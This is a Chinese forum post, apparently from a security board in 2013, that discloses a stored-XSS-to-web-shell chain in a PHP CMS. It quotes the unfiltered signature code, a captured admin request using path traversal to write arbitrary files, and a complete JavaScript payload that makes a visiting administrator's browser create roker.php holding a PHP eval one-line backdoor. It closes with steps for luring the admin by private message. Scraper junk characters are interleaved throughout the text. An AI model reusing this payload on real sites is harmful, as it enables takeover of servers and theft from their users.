|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题5 X/ Q# ^2 l1 q4 R
官网已经修补了,所以重新下了源码
0 a: E/ r' H9 q* N# C2 p因为 后台登入 还需要认证码 所以 注入就没看了。
* M# a9 C7 r! G/ O3 T! j6 ?存在 xss# ]$ @1 |4 }* T" d8 f4 k
漏洞文件 user/member/skin_edit.php1 G3 s9 D/ R, V* Y7 R- v. {
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
$ k0 j' t6 z0 v" Q1 ]
1 ]0 j" p' f* c; o</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>4 p- Q& S3 ^ b
2 H* z1 Z# j: b$ O! |. x' M</textarea></td></tr>' G9 Z- f1 _: H
2 M4 R. I0 b3 e2 a user/do.php
( }: N$ G8 U+ U7 e e; B \. M
0 S' a% w! \2 c8 s
/ V6 B: y7 i$ i) Jif($op=='zl'){ //资料3 ]! W7 S' F% p# f! G
1 O% P$ Q0 `4 F if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
" S% { m# B% A/ Q" i' [ exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));4 ]- t$ l& |2 _
! ^3 `/ W5 i: c# p
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',8 K& ~- G X/ k8 O# D/ L9 F
) j7 A0 d+ u" l6 V
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ c P z8 m; h3 d S
where CS_Name='".$cscms_name."'";
# k7 D: D6 L S% k
; O0 s. t; [- A0 @( l if($db->query($sql)){
& W. e, w; a2 S# d, } S9 ? ' i$ a$ J' \3 q5 L& r9 l1 _2 l9 v
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
/ Q0 R; _) v: { P
, D$ D' E1 Y& N2 _0 B2 l }else{
9 k6 _8 P6 E! }, c, v4 G5 d; O5 ]
' {% K) H3 T. J! P- }' | exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 \; S$ D/ L. j8 h
. k: V8 L( s% |% q
}4 `, p3 G9 ^( B4 N& _
2 Q; n; a6 ?0 `8 |6 i
# \7 c" e: L+ o6 F没有 过滤导致xss产生。! f+ U' u- v2 t2 x$ S
后台 看了下 很奇葩的是可以写任意格式文件。。
o! q$ o8 f) K h, y' @抓包。。
E/ G9 y' q9 Y; ^5 J' R: x+ ]5 H# r5 W# y: V, q" ~' v
5 n2 ?% }: X! H& N本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1$ T N2 O* S' g2 L
; h7 p# O) v1 [0 w7 O! zAccept: text/html, application/xhtml+xml, */*% D4 a( ]& \) e* j% D N. p
9 q( z9 `: F4 GReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
2 n) w: F, E9 Z; \- U2 x+ z# a9 l
& j4 f8 M! ~1 I' a$ t2 RAccept-Language: zh-CN
% I: l" T9 k) p A$ E0 ]' u
8 `0 J( M6 z# C6 Q* g! oUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
$ n) [* d/ y8 W
/ X2 L# r1 U* k. Z0 N2 }/ M: f7 hContent-Type: application/x-www-form-urlencoded. C! F9 E( ?1 |+ Q1 N+ m! j. f
j* l: ?& W9 v/ A7 j' {
Accept-Encoding: gzip, deflate2 f8 { c+ X0 t: o& { m
0 Y9 h& y" A1 g) D4 U, e# q ~2 n0 WHost: 127.0.0.16 N" B/ m, F7 z% d
9 r* R9 G+ p1 i+ @
Content-Length: 38
( P& U" _ s/ t @5 S- ]! t
8 d: ]! Q. n3 H6 O: @) q) }: LDNT: 1# S) o& T0 S6 `$ t# A1 P
* t0 U- f0 k7 c9 T" R; h5 v
Connection: Keep-Alive& x( ?+ o6 S, K9 e9 z
, X6 E3 U/ s h; R8 s% UCache-Control: no-cache
" J9 D$ K5 f) n3 @! ]- f9 N X# Y, G. J* T6 E9 _" V
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594, B) p+ q9 O6 U4 U {! s9 `
, o& i: @& j/ G- |/ k' k8 g6 D, L/ n# G
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
/ z ~. b) z, K, Y Q$ c, F
0 c7 V9 }3 ]+ }- J' g5 a2 A% O6 |3 m" y! S4 G. r
- {3 _- g& E/ K7 `8 N* o, i+ }
于是 构造js如下。$ v) z- Y1 B# M# W+ c( @
: m) ]) R' E! Z! y: N本帖隐藏的内容<script> % l4 ~# u' @3 P5 ^
thisTHost = top.location.hostname;
3 n# }3 H8 W" G# c& g% m # l- W7 p( w* F- S8 z+ n
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";% D+ @ P* j" h
9 A) y j) d1 L3 Efunction PostSubmit(url, data, msg) {
# o+ s [: a: y2 i; S( ~4 z var postUrl = url;# P \. V9 l6 Z. }. Q1 p; @
6 t; V; C5 L$ E
var postData = data;
' C( E! M' z4 N' x var msgData = msg;
2 E8 |6 H" ]0 Z! [, k var ExportForm = document.createElement("FORM"); 6 Y+ b8 q- |, T; A
document.body.appendChild(ExportForm); 0 |3 l. ]" K( c5 F7 L) e/ I) I
ExportForm.method = "POST";
; E" `* ~1 @' m; Y var newElement = document.createElement("input"); & [# Q2 `, ~! W: Q- }8 Q8 q, N8 k
newElement.setAttribute("name", "name"); / p) Q7 |% [8 q. Z
newElement.setAttribute("type", "hidden"); 5 X6 P& y4 J3 \& U0 _
var newElement2 = document.createElement("input");
% t& {3 a* {- F. O newElement2.setAttribute("name", "content");
9 x# q2 a6 z8 L+ ?8 G newElement2.setAttribute("type", "hidden"); ! m* s3 n* b3 f
ExportForm.appendChild(newElement);
# R- b% [3 d, _, g2 X( G- L6 i5 B" ] ExportForm.appendChild(newElement2);
' ]; h0 e! y5 Z6 v5 h4 p7 R1 A8 {: U newElement.value = postData; 1 p0 K1 |) S. p7 c" M, @* S. i
newElement2.value = msgData; ) ^0 d1 y' T4 J7 p, B7 S( ~+ E6 x
ExportForm.action = postUrl; - g- L; y, K0 r& g9 C6 o0 m0 g
ExportForm.submit(); , E2 O9 c' [5 [, J2 K
};
5 m9 |3 l( c+ H; m1 h5 H# |
6 c4 c, R$ {3 L! LPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
( b+ |( N- C/ a9 P2 q K# T 3 l8 ?# o$ R4 }: p4 K w; p. Z
</script>
1 R, g7 O B2 n5 n, S
4 v+ P7 U9 J! ~
0 `1 p. Y. E( f5 a* @+ A1 \3 |+ p1 o4 o' u$ N9 p7 S) v* U
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
3 I* K/ @+ T+ n) s9 b* D4 R9 \用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改); }0 a! v0 h1 j
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
( y) a$ B J3 m: j3 _7 p6 P |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对